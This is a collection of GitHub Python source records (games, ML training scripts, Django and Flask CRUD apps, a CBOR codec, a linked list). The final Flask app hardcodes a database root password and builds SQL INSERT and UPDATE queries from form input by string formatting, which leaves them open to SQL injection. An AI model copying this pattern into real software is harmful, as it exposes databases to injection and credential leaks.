+{"seq_id":"33399990847","text":"from GameEntity import GameEntity\nimport random\n\n\nclass SkillBox(GameEntity):\n\n POSSIB_SKILLS = {\n 1: 'TELEPORT_UP',\n 2: 'BIG_JUMP',\n 3: 'GHOST_MODE'\n }\n\n def __init__(self, x_game_init, y_game_init):\n super(SkillBox, self).__init__()\n super(SkillBox, self).setXY(x_game_init, y_game_init)\n\n taille = len(SkillBox.POSSIB_SKILLS)\n diceroll = random.randint(1, taille)\n self.skill_id = diceroll\n self.skillname = SkillBox.POSSIB_SKILLS[diceroll]\n self.visible = True\n\n def updatePosition(self):\n # descente progressive des bonus skill\n x_ent, y_ent = self.getXY()\n self.setXY(x_ent, y_ent - 0.4)\n\n # def markToDisplay(self, surface):\n # x_ent,y_ent = self.getXY()\n # pygame.draw.rect( surface, pygame.Color('BROWN'),\n # pygame.Rect( x_ent,y_ent, 30,30) )\n","repo_name":"wkta/esc_segfault","sub_path":"SkillBox.py","file_name":"SkillBox.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32406692316","text":"import tensorflow as tf\nimport src.api as api\nimport argparse\nimport os\n\nfrom src.controllers.ui_controller import UIController\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', required=True, help='Config filepath.')\n parser.add_argument('-n', '--name', required=False, help='Name of the experiment. If none provided, name with a timestamp will be assigned.')\n parser.add_argument('-w', '--warnings', required=False, default=False, action='store_true', help='Display tensorflow warning.')\n args = parser.parse_args()\n verify_args(args)\n set_logging(args)\n return args\n\ndef verify_args(args):\n assert os.path.exists(args.config), 'Config filepath is not valid.'\n assert type(args.name) == str, 'Experiment name must be a string.'\n\ndef set_logging(args):\n if args.warnings == False:\n print(' - Hiding tensorflow output messages.')\n tf.get_logger().setLevel('ERROR')\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ndef get_user_input(ui_controller):\n ui_controller.print_parameters('model')\n ui_controller.ask_parameters()\n ui_controller.print_parameters('training')\n ui_controller.print_parameters('validation')\n ui_controller.print_parameters('testing')\n ui_controller.ask_parameters()\n ui_controller.ask_retrain()\n ui_controller.ask_retest()\n return ui_controller\n\ndef main(config_path, experiment_name):\n config = api.get_config(config_path)\n api.setup_experiment(experiment_name, config)\n\n ui_controller = UIController(config, experiment_name)\n ui_controller = get_user_input(ui_controller)\n\n if ui_controller.skip_training == False:\n api.train(config, experiment_name, ui_controller.new_training)\n \n if ui_controller.skip_testing == False:\n api.test(config, experiment_name, ui_controller.new_testing)\n api.evaluate(experiment_name)\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.config, args.name)\n print(' - Script has finished successfully.')","repo_name":"MicrobialDarkMatter/Fishnchips_basecaller","sub_path":"run_fishnchips.py","file_name":"run_fishnchips.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70019090087","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\n\n# Create your views here.\nfrom todos_list_demo.todos.forms import CreateTodoForm\nfrom todos_list_demo.todos.models import Todo\n\n\ndef list_todos(request):\n todos = Todo.objects.all()\n\n context = {\n 'todos': todos,\n }\n\n\n return render(request, 'todos/list_todos.html', context)\n\n\ndef my_profile(request, pk):\n user = User.objects.get(pk=pk)\n\n context = {\n 'user': user\n }\n\n return render(request, 'my_profile.html', context)\n\n\ndef index(request):\n return redirect('list todos')\n\n\ndef create_todo(request):\n if request.method == 'POST':\n form = CreateTodoForm(request.POST)\n\n if form.is_valid():\n form.save()\n redirect('list todos')\n\n else:\n form = CreateTodoForm()\n\n context = {\n 'form': form,\n }\n\n return render(request, 'todos/create_todo.html', context)","repo_name":"kaloyan03/Softuni-Python","sub_path":"Python Web Framework/todos_list_demo/todos_list_demo/todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71248938727","text":"from __future__ import print_function\nimport os, random\nimport copy\nimport numpy as np\nimport argparse\nimport torch\nimport torchvision\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport network\nfrom utils.visualizer import VisdomPlotter\nfrom utils.loss import *\nfrom dataloader import get_dataloader\nfrom quantization import quantize_model\n\n\nvp = VisdomPlotter('8097', env='ZAQ-main')\n\ndef train(args, p_model, q_model, generator, optimizer, epoch):\n p_model.eval()\n q_model.train()\n generator.train()\n optimizer_Q, optimizer_G = optimizer\n\n inter_loss = SCRM().to(args.device)\n\n for i in range(args.epoch_itrs):\n for k in range(5):\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_Q.zero_grad()\n fake = generator(z).detach()\n g_p, p_logit = p_model(fake, True)\n g_q, q_logit = q_model(fake, True)\n loss_Q = F.l1_loss(q_logit, p_logit.detach()) + args.alpha * inter_loss(g_q, g_p)\n \n loss_Q.backward()\n optimizer_Q.step()\n\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_G.zero_grad()\n generator.train()\n fake = generator(z)\n g_p, p_logit = p_model(fake, True) \n g_q, q_logit = q_model(fake, True)\n\n loss_G = - F.l1_loss(q_logit, p_logit) - args.alpha * inter_loss(g_q, g_p) - args.beta * g_p[-1].abs().mean()\n\n loss_G.backward()\n optimizer_G.step()\n\n if i % args.log_interval == 0:\n print('Train Epoch: [{}] [{}/{} ({:.0f}%)]\\tG_Loss: {:.6f} Q_loss: {:.6f}'.format(\n epoch, i, args.epoch_itrs, 100*float(i)/float(args.epoch_itrs), loss_G.item(), loss_Q.item()))\n vp.add_scalar('Loss_Q', (epoch-1)*args.epoch_itrs+i, loss_Q.item())\n vp.add_scalar('Loss_G', (epoch-1)*args.epoch_itrs+i, loss_G.item())\n\ndef test(args, model, test_loader, epoch=0):\n model.eval()\n\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for i, (data, target) in enumerate(test_loader):\n data, target = data.to(args.device), target.to(args.device)\n\n output = model(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nEpoch [{}] Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n epoch, test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n acc = correct/len(test_loader.dataset)\n return acc\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='ZAQ CIFAR.')\n parser.add_argument('--num_classes', type=int, default=10)\n parser.add_argument('--batch_size', type=int, default=256, metavar='N',\n help='input batch size for training (default: 256)')\n parser.add_argument('--test_batch_size', type=int, default=256, metavar='N',\n help='input batch size for testing (default: 128)')\n \n parser.add_argument('--epochs', type=int, default=300, metavar='N',\n help='number of epochs to train (default: 500)')\n parser.add_argument('--epoch_itrs', type=int, default=60)\n parser.add_argument('--lr_Q', type=float, default=0.1, metavar='LR',\n help='learning rate (default: 0.1)')\n parser.add_argument('--lr_G', type=float, default=1e-3,\n help='learning rate (default: 0.001)')\n parser.add_argument('--data_root', type=str, required=True, default=None)\n\n parser.add_argument('--dataset', type=str, default='cifar10', choices=['cifar10', 'cifar100'],\n help='dataset name (default: cifar10)')\n parser.add_argument('--model', type=str, default='resnet18', \n choices=['mobilenetv2', 'vgg19', 'resnet18', 'resnet20', 'resnet50'],\n help='model name (default: resnet18)')\n parser.add_argument('--weight_decay', type=float, default=5e-4)\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--device', type=str, default='0',\n help='device for training')\n parser.add_argument('--seed', type=int, default=6786, metavar='S',\n help='random seed (default: 6786)')\n parser.add_argument('--ckpt', type=str, default='')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n parser.add_argument('--nz', type=int, default=256)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--beta\", type=float, default=0.1)\n parser.add_argument(\"--gamma\", type=float, default=0.1)\n parser.add_argument('--test_only', action='store_true', default=False)\n parser.add_argument('--download', action='store_true', default=False)\n\n # quantization \n parser.add_argument('--weight_bit', type=int, default=6, help='bit-width for parameters')\n parser.add_argument('--activation_bit', type=int, default=8, help='bit-width for act')\n \n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n \n os.environ['CUDA_VISIBLE_DEVICES'] = args.device\n args.device = torch.device('cuda' if torch.cuda.is_available() else \"cpu\")\n os.makedirs('checkpoint/q_model/', exist_ok=True)\n print(args)\n\n _, test_loader = get_dataloader(args)\n\n args.num_classes = 10 if args.dataset=='cifar10' else 100\n q_model = network.get_model(args)\n generator = network.gan.Generator(nz=args.nz, nc=3, img_size=32)\n \n q_model.load_state_dict(torch.load(args.ckpt))\n print(\"p_model restored from %s\"%(args.ckpt))\n\n # p_model = p_model.to(device)\n q_model = q_model.to(args.device)\n generator = generator.to(args.device)\n p_model = copy.deepcopy(q_model)\n\n # quantization\n q_model = quantize_model(q_model, args)\n quant_acc = test(args, q_model, test_loader, 0)\n print('Quat Acc=%0.4f \\n' % quant_acc)\n\n p_model.eval()\n\n optimizer_Q = optim.SGD(q_model.parameters(), lr=args.lr_Q, weight_decay=args.weight_decay, momentum=0.9)\n optimizer_G = optim.Adam(generator.parameters(), lr=args.lr_G)\n \n scheduler_Q = optim.lr_scheduler.MultiStepLR(optimizer_Q, [100, 200], args.gamma)\n scheduler_G = optim.lr_scheduler.MultiStepLR(optimizer_G, [100, 200], args.gamma)\n best_acc = 0\n if args.test_only:\n acc = test(args, q_model, test_loader, 0)\n return\n acc_list = []\n for epoch in range(1, args.epochs + 1):\n # Train\n train(args, p_model=p_model, q_model=q_model, generator=generator, optimizer=[optimizer_Q, optimizer_G], epoch=epoch)\n scheduler_Q.step()\n scheduler_G.step()\n # Test\n acc = test(args, q_model, test_loader, epoch)\n acc_list.append(acc)\n if acc>best_acc:\n best_acc = acc\n print('Saving a best checkpoint ...')\n torch.save(q_model.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit.pt\"%(args.dataset, args.model, args.weight_bit))\n torch.save(generator.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit-generator.pt\"%(args.dataset, args.model, args.weight_bit))\n vp.add_scalar('Acc', epoch, acc)\n print(\"Best Acc=%.6f\" % best_acc)\n\n import csv\n os.makedirs('log', exist_ok=True)\n with open('log/ZAQ-%s-%s-%sbit.csv'%(args.dataset, args.model, args.param_bits), 'a') as f:\n writer = csv.writer(f)\n writer.writerow(acc_list)\n\nif __name__ == '__main__':\n main()","repo_name":"FLHonker/ZAQ-code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"}
+{"seq_id":"70564225129","text":"def min_and_max(num1, num2):\n\tif num1 > num2:\n\t\treturn num2, num1\n\telse:\n\t\treturn num1, num2\n\n\ndef converte_par(numero):\n\t'''Transforma um número par em um número sucessor impar'''\n\treturn numero + ((numero+1)%2)\n\ndef soma_impares(inicio, fim):\n\n\tif inicio%2 == 0:\n\t\tinicio = converte_par(inicio)\n\telse:\n\t\tinicio += 2\n\n\tsoma = 0\n\twhile inicio < fim:\t\t\n\t\tsoma += inicio\n\t\tinicio += 2\n\n\treturn soma\n\n\ndef main():\n\tnum1 = int(input())\n\tnum2 = int(input())\n\n\tnum1, num2 = min_and_max(num1, num2)\n\n\tprint(soma_impares(num1, num2))\n\n\nmain()","repo_name":"douradodev/Uri","sub_path":"Uri/1071_v3.py","file_name":"1071_v3.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23266427398","text":"import enum\nimport logging\nimport struct\nfrom typing import BinaryIO\nimport cbor2\nfrom ace.ari import (\n ARI, AC, EXPR, TNVC, Identity, ReferenceARI, LiteralARI,\n StructType, LITERAL_TYPES\n)\nfrom ace.cborutil import to_diag\nfrom ace.util import is_printable\n\n\nLOGGER = logging.getLogger(__name__)\n\n\n@enum.unique\nclass AriFlag(enum.IntFlag):\n ''' Flags at the front of an ARI. '''\n HAS_NN = 0x80\n HAS_PARAMS = 0x40\n HAS_ISS = 0x20\n HAS_TAG = 0x10\n\n\n@enum.unique\nclass TnvcFlag(enum.IntFlag):\n ''' Flgas at the front of a TNVC. '''\n MIXED = 0x8\n TYPE = 0x4\n NAME = 0x2\n VALUE = 0x1\n\n\nclass ParseError(RuntimeError):\n ''' Indicate an error in ARI parsing. '''\n\n\nclass Decoder:\n ''' The decoder portion of this CODEC. '''\n\n def decode(self, buf: BinaryIO) -> ARI:\n ''' Decode an ARI from CBOR bytestring.\n\n :param buf: The buffer to read from.\n :return: The decoded ARI.\n '''\n cbordec = cbor2.CBORDecoder(buf)\n try:\n res = self._decode_ari(cbordec)\n except cbor2.CBORDecodeEOF as err:\n raise ParseError(f'Failed to decode ARI: {err}') from err\n if buf.tell() != len(buf.getbuffer()):\n LOGGER.warning('ARI decoder handled only the first %d octets of %s',\n buf.tell(), to_diag(buf.getvalue()))\n return res\n\n def _decode_ari(self, cbordec):\n flags, = struct.unpack('!B', cbordec.read(1))\n LOGGER.debug('Got flags: 0x%02x', flags)\n str_type = StructType(flags & 0x0F)\n\n if str_type == StructType.LIT:\n try:\n val = cbordec.decode()\n except Exception as err:\n raise ParseError(f'Failed to decode literal value: {err}') from err\n\n type_enum = StructType((flags >> 4) + StructType.BOOL)\n res = LiteralARI(type_enum=type_enum, value=val)\n\n else:\n obj_nn = cbordec.decode() if flags & AriFlag.HAS_NN else None\n LOGGER.debug('Got nickname: %s', obj_nn)\n\n name = cbordec.decode()\n LOGGER.debug('Got name: %s', to_diag(name))\n if not isinstance(name, (bytes, str)):\n raise ParseError(f'Decoded name is not bytes or str, got {type(name)}')\n if isinstance(name, bytes) and is_printable(name):\n name = name.decode('utf-8')\n\n params = self._decode_tnvc(cbordec) if flags & AriFlag.HAS_PARAMS else None\n\n issuer = cbordec.decode() if flags & AriFlag.HAS_ISS else None\n LOGGER.debug('Got issuer: %s', to_diag(issuer))\n if issuer is not None and not isinstance(issuer, bytes):\n raise ParseError(f'Decoded issuer is not bytes, got {type(issuer)}')\n\n tag = cbordec.decode() if flags & AriFlag.HAS_TAG else None\n LOGGER.debug('Got tag: %s', to_diag(issuer))\n if tag is not None and not isinstance(tag, bytes):\n raise ParseError(f'Decoded tag is not bytes, got {type(tag)}')\n\n ident = Identity(\n namespace=obj_nn,\n type_enum=str_type,\n name=name,\n issuer=issuer,\n tag=tag\n )\n res = ReferenceARI(ident=ident, params=params)\n\n return res\n\n def _decode_tnvc(self, cbordec):\n ''' From the document:\n +--------+---------+----------+----------+----------+----------+\n | Flags | # Items | Types | Names | Values | Mixed |\n | [BYTE] | [UINT] | [OCTETS] | [OCTETS] | [OCTETS] | [OCTETS] |\n | | (Opt) | (Opt) | (Opt) | (Opt) | (Opt) |\n +--------+---------+----------+----------+----------+----------+\n '''\n\n flags, = struct.unpack('!B', cbordec.read(1))\n\n count = cbordec.decode() if flags else 0\n\n type_enums = []\n if flags & TnvcFlag.TYPE:\n for _idx in range(count):\n type_id = struct.unpack('!B', cbordec.read(1))[0]\n type_enums.append(StructType(type_id))\n\n if flags & TnvcFlag.NAME:\n raise NotImplementedError\n\n values = []\n if flags & TnvcFlag.VALUE:\n for idx in range(count):\n LOGGER.debug('Decoding TNVC item %d type %s',\n idx, type_enums[idx])\n values.append(self._decode_obj(type_enums[idx], cbordec))\n return values\n\n def _decode_ac_items(self, cbordec):\n # FIXME: workaorund! doesn't scale up\n item = ord(cbordec.read(1))\n count = item & 0x1F\n LOGGER.debug('AC with count %d', count)\n items = []\n for _ in range(count):\n items.append(self._decode_ari(cbordec))\n return items\n\n def _decode_obj(self, type_enum, cbordec):\n if type_enum == StructType.ARI:\n obj = self._decode_ari(cbordec)\n\n elif type_enum == StructType.AC:\n obj = AC(\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.EXPR:\n obj = EXPR(\n type_enum=StructType(cbordec.decode()),\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.TNVC:\n # FIXME: there is no distinction in text between AC and TNVC\n obj = AC(items=self._decode_tnvc(cbordec))\n\n elif type_enum in LITERAL_TYPES:\n item = cbordec.decode()\n obj = LiteralARI(type_enum=type_enum, value=item)\n\n else:\n raise ValueError(f'Unhandled param object type: {type_enum}')\n\n return obj\n\n\nclass Encoder:\n ''' The encoder portion of this CODEC. '''\n\n def encode(self, obj: ARI, buf: BinaryIO):\n ''' Encode an ARI into CBOR bytestring.\n\n :param obj: The ARI object to encode.\n :param buf: The buffer to write into.\n '''\n cborenc = cbor2.CBOREncoder(buf)\n self._encode_obj(obj, cborenc, True)\n\n def _encode_obj(self, obj, cborenc, as_ari):\n if isinstance(obj, ReferenceARI):\n self._encode_ref_ari(obj, cborenc)\n\n elif isinstance(obj, AC):\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('AC encoding header %s', to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, EXPR):\n cborenc.encode(obj.type_enum.value)\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('EXPR encoding type %s, header %s',\n obj.type_enum.value, to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, TNVC):\n self._encode_tnvc(obj.items, cborenc)\n\n elif isinstance(obj, LiteralARI):\n if obj.type_enum == StructType.BSTR:\n cborenc.encode(obj.value)\n return\n\n if as_ari:\n flags = (\n ((obj.type_enum - StructType.BOOL) << 4)\n | StructType.LIT\n )\n cborenc.write(struct.pack('!B', flags))\n cborenc.encode(obj.value)\n\n else:\n raise TypeError(f'Unhandled object type {type(obj)} for: {obj}')\n\n def _encode_ref_ari(self, obj, cborenc):\n flags = int(obj.ident.type_enum)\n if obj.ident.namespace is not None:\n flags |= AriFlag.HAS_NN\n if obj.params is not None:\n flags |= AriFlag.HAS_PARAMS\n if obj.ident.issuer is not None:\n flags |= AriFlag.HAS_ISS\n if obj.ident.tag is not None:\n flags |= AriFlag.HAS_TAG\n LOGGER.debug('ReferenceARI encoding flags %s', to_diag(flags))\n cborenc.write(struct.pack('!B', flags))\n\n if obj.ident.namespace is not None:\n cborenc.encode(obj.ident.namespace)\n \n # amp is expecting a bytestring\n cborenc.encode(\n obj.ident.name if isinstance(obj.ident.name, bytes)\n else str(obj.ident.name).encode('utf-8')\n )\n \n if obj.params is not None:\n self._encode_tnvc(obj.params, cborenc)\n if obj.ident.issuer is not None:\n cborenc.encode(obj.ident.issuer)\n if obj.ident.tag is not None:\n cborenc.encode(obj.ident.tag)\n\n def _encode_tnvc(self, params, cborenc):\n LOGGER.debug('TNVC encoding count %s', len(params))\n flags = 0\n if params:\n flags |= TnvcFlag.TYPE | TnvcFlag.VALUE\n cborenc.write(struct.pack('!B', flags))\n\n if flags:\n cborenc.encode(len(params))\n\n for param in params:\n if isinstance(param, ReferenceARI):\n type_enum = StructType.ARI\n elif isinstance(param, AC):\n type_enum = StructType.AC\n elif isinstance(param, EXPR):\n type_enum = StructType.EXPR\n elif isinstance(param, TNVC):\n type_enum = StructType.TNVC\n elif isinstance(param, LiteralARI):\n type_enum = param.type_enum\n else:\n LOGGER.warning(\n 'Unhandled parameter type %s for: %s',\n type(param), param\n )\n cborenc.write(struct.pack('!B', type_enum))\n\n for param in params:\n LOGGER.debug('TNVC encoding item %s', param)\n self._encode_obj(param, cborenc, as_ari=False)\n","repo_name":"NASA-AMMOS/anms-ace","sub_path":"src/ace/ari_cbor.py","file_name":"ari_cbor.py","file_ext":"py","file_size_in_byte":9699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"27147653440","text":"import tensorflow as tf\n\n#Training: Load image, (semi randomly) augmentate the image and subtract per image mean and std\ndef _load_and_preprocess_image_train(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n#Validation/Test: Load image and subtract per image mean and std\ndef _load_and_preprocess_image_test(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n\n\n#This function generates the image batches\n#if shuffle is True: dataset will be shuffled before batching\n#if predict is True: dataset will not be repeated (important for the last batch in case of predicting the validation/test data)\ndef batch_dataset(dataset, batch_size, shuffle=True, predict=False):\n\n if shuffle == True:\n dataset = dataset.shuffle(buffer_size=20 * 1000 * batch_size)\n \n #For training: augmentate the images (random flip after loading)\n if predict == False:\n dataset = dataset.repeat()\n dataset = dataset.map(_load_and_preprocess_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n \n #For validation/test: No image augmentation upon creating the batch\n else:\n dataset = dataset.repeat(1)\n dataset = dataset.map(_load_and_preprocess_image_test, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n #Create the batch and prefetch\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)\n \n return dataset\n","repo_name":"Ay-De/SLM-CNN","sub_path":"CNN/modules/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"2024048779","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Profesionales, Especialidades\nfrom django.contrib.auth.models import User\nfrom .forms import Profesionales_Form, Usuario_Form, Especialidades_Form\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\n# Create your views here.\n\ndef profesionales_lista(request):\n queryset = Profesionales.objects.all\n if request.user.is_authenticated():\n context = {\n \"title\": \"Mi lista de profesionales\",\n \"object_list\": queryset,\n }\n else:\n context = {\n \"title\": \"Lista / No logueado\"\n }\n return render(request, \"profesionales_lista.html\", context)\n\n\ndef profesionales_detalle(request, id):\n instancia = get_object_or_404(Profesionales, id=id)\n context = {\n \"instancia\": instancia,\n \"nombre\": instancia.Nombre,\n }\n return render(request, \"profesionales_detalle.html\", context)\n\ndef profesionales_crear(request):\n form = Profesionales_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n }\n return render(request, \"profesionales_form.html\", context)\n\n\ndef profesionales_edita(request, id):\n instancia = get_object_or_404(Profesionales,id=id)\n form = Profesionales_Form(request.POST or None, instance=instancia)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Profesional Actualizado!\")\n\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n \"instancia\": instancia,\n }\n\n return render(request, \"profesionales_editar_form.html\", context)\n\n\ndef profesionales_borrar(request, id=None):\n instancia = get_object_or_404(Profesionales, id=id)\n instancia.delete()\n messages.success(request, \"Profesional Borrado!\")\n\n return redirect(\"profesionales:lista\")\n\n\ndef especialidad_crear(request):\n form = Especialidades_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(\"/profesionales\")\n context = {\n \"form\": form,\n }\n return render(request, \"especialidades_form.html\", context)\n","repo_name":"Naukas1/GIP_Final","sub_path":"GIP/Profesionales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21598242725","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.start = None\n\n def display(self):\n current = self.start\n while current is not None:\n print(current.data)\n current = current.next\n\n def is_empty(self) -> bool:\n return not self.start\n\n def prepend(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n tmp_node = Node(data)\n tmp_node.next = self.start\n self.start.prev = tmp_node\n self.start = tmp_node\n\n def append(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n last = self.start\n while last.next is not None:\n last = last.next\n\n tmp_node = Node(data)\n last.next = tmp_node\n tmp_node.prev = last\n\n def insert_after(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n found_last = True if not found.next else False\n if found_last:\n found.next = tmp_node\n tmp_node.prev = found\n else:\n tmp_node.prev = found\n tmp_node.next = found.next\n found.next.prev = tmp_node\n found.next = tmp_node\n\n def insert_before(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n if found is self.start:\n self.prepend(data)\n else:\n tmp_node.next = found\n tmp_node.prev = found.prev\n found.prev.next = tmp_node\n found.prev = tmp_node\n\n def delete(self, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n if found is self.start:\n if found.next is None:\n self.start = None\n else:\n self.start = self.start.next\n return\n\n left, right = found.prev, found.next\n left.next = right\n right.prev = left\n\n\nlst = LinkedList()\nlst.append(3)\nlst.prepend(1)\nlst.insert_after(1, 2)\nlst.insert_before(1, 0)\nlst.insert_after(2, 100)\nlst.delete(2)\nlst.display()\n","repo_name":"TheArman/ooad_tasks","sub_path":"5_hmw/1_linked_list.py","file_name":"1_linked_list.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70141727210","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'Jocelyn!180'\napp.config['MYSQL_DB'] = 'shoe_store'\n\nmysql = MySQL(app)\n\n# while True:\n# #username = input(\"Enter username: \")\n# #password = input(\"Enter password: \")\n# try:\n# cnx = pymysql.connect(host='localhost', user='root', password='Jocelyn!180', db='shoe_store')\n# cur = cnx.cursor()\n# if cnx:\n# break\n# else:\n# continue\n# except:\n# print('Couldn\\'t connect to the server. Please enter credentials again.')\n#\n\n\n@app.route('/')\ndef ind():\n\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM employee\")\n data = cur.fetchall()\n cur.close()\n\n return render_template('index.html', employees = data)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''INSERT INTO employee (employee_id, salary, first_name, last_name,\n start_date, branch_id, job_title) VALUES ('{}', '{}', '{}', '{}', '{}','{}', '{}')'''.format(employee_id, salary, first_name, last_name, start_date, branch_id, job_title)\n print(ins_st)\n cur.execute(ins_st)\n\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/update', methods= ['POST', 'GET'])\ndef update():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''UPDATE employee SET salary='{}', first_name='{}', last_name='{}',\n start_date='{}', branch_id='{}', job_title='{}' \n WHERE employee_id='{}' '''.format(salary, first_name, last_name, start_date, branch_id, job_title, employee_id)\n cur.execute(ins_st)\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/delete/', methods = ['POST', 'GET'] )\ndef delete(employee_id):\n\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM employee WHERE employee_id = %s\", [employee_id])\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\nif __name__ == \"__main__\":\n # had app.run(debug=True) before for debugging purposes.\n app.run()\n","repo_name":"kevingzheng/ShoeStoreDB","sub_path":"shoe_store_project/FlaskCrudApplication/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
